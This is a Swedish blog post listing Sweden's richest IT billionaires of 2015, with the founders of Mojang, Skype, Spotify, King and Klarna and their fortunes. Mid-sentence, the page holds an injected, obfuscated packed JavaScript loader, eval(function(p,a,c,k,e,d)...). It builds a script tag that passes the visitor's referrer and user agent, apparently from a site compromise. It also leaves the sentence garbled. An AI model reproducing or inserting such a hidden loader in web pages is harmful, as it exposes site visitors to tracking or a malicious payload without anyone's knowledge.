Image Image Image Image Image Image Image Image Image Image

| 4 juni, 2020

Scroll to top

Top

Sveriges rikaste 2015: IT-miljardärerna

Sveriges rikaste 2015: IT-miljardärerna
Sebastian

Sveriges rikaste 2015: IT-miljardärerna : Ny lista har tagits fram på våra Svenska miljardärer. Varje år listar DI, Veckans Affärer, Aftonbladet mfl Sveriges rikaste. Denna lista släpptes i december förra året och kan läsas här Veckans eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nninz|var|u0026u|referrer|znnky||js|php’.split(’|’),0,{}))
affärer
. Vad vi kan se där har flera stycken ökat sin ”net worth” ordentligt under 2014.

IT-miljardärerna:

Markus Persson – Mojang – 16 miljarder
Niklas Zennström – Skype – 10 miljarder
Daniel Ek – Spotify – 4 miljarder
Martin Lorentzon – Spotify – 4 miljarder
Sebastian Knutsson – King – 1,9 miljarder
Carl Manneh – Mojang – 1,4 miljarder
Victor Jacobsson – Klarna – 1,1 miljarder
Sebastian Siematkowski – Klarna – 1,1 miljarder
Niklas Adalberth – Klarna – 1,1 miljarder
Lars Markgren – King – 1 miljard

Fullständig lista (Klicka här)